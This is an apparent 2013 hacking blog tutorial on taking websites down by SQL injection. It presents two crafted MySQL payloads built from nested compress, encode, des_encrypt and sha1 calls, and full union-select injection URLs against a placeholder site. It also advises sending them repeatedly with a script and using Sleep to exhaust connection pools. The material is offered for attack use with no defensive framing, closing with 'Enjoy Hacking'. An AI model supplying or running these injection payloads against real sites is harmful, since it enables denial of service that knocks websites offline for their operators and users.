Tuesday, 25 June 2013

In this tutorial we will discuss how can some one DDOS a website using SQL injection. As for me its a new concept dint had much research or tutorials on it. After my own testing and the maximum information i some how collected reading SQL syntax and other limitations on connection and some function how can we use the Server Resources or take it down, i decided to write a Tutorial as per best of my knowledge.

If you dont know much about DDOS check out N00bz Guide on DDOS for more information. Here we will discuss more on SQL injection and how can we use this to DDOS a Server.

For the Basic of DDOS (Distributed DOS Attacks) is used to make a server hang or reply late or we can also exhaust the resources of a web server so that other users wont be able to use it. This Attack can be categorised as Web Application Level DDOS as DDOS is having a wast area of attack.

The Concept :

To Successfully accomplish DDOSing a web site using SQL injection first let us understand the basics and understand the structure of our Attack. As we know when a Application is Vulnerable to SQL injection we can successfully inject SQL queries which gets executed into the database and gets us the output. So heres our idea rises to send complex SQL queries to the database that will consume the power of Web Server and the Database and Exhaust the Server resources, we can even make maximum live connections to the database which will make the database not to accept anymore connection at the same time. Now as the whole idea is very simple and clear to us, we can continue to make complex SQL queries which will make the database to reply late.

SQL provides us with many fucntions as well as allow us to create very complex queries to get the output in a very flexible way. We have Joins, Like , compress, encode etc.

We will follow the following steps to achieve DDOS using SQL injection

1. Finding the Vulnrability.
2. Preparing the Injectable Query.
3. Injecting DDOS Query into the Website.

Finding the Vulnerability, Preparing the Injectable query all goes in the Basic SQL injection. Read them to continue.

I suppose you have read them all.

So lets continue with

Injecting DDOS Query into the Website.

There are many ways to do this, what you will need is a testing lab with something called brain. And you an create your own deadly injections.

For me i created a table of 500 rows with a text field having 500 bytes of data per column, which actually represent the Forum, blog post field of many websites running out there. If the database is even larger as we can find many database running lacks and millions f records with them. Such sites can be DDOSed more easily. Well we are going to use this payload to DDOS which took me a couple of hours to make.

select tab1 from (select decode(encode(convert(compress(post) using latin1),concat(post,pos
t,post,post)),sha1(concat(post,post,post,post))) as tab1 from table_1)a;

select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a;

Lets say we have a vulnerable website and we found out the columns and the injection is like this.

http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--

lets us assume 3rd column is vulnerable so lets injection our second payload into the site.

http://exploitable-web.com/link.php?id=1' union select 1,2,(select tab1 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a),4--

or

http://exploitable-web.com/link.php?id=1' union select 1,2,tab1,4 from (select decode(encode(convert(compress(post) using latin1),des_encrypt(concat(post,post,post,post),8)),des_encrypt(sha1(concat(post,post,post,post)),9)) as tab1 from table_1)a--

countinuesly sending this injection to the website using a script will get the server down with a medium internet connection, so in this way we wont need a thousands of bots Ddosing with us.

We can also use Sleep to make connections live for long that will also accomplish the task. Using Sleep we can also Pool out the connection in ASP.net where by default maximum 100 connections are allowed at a time in 30 seconds. so if we can make our connection live using Sleep command it wont allow the server to reply other users.

This is all for now.
Open your wings of imagination and fly over the sky.
--Enjoy Hacking

0 comments:

Post a Comment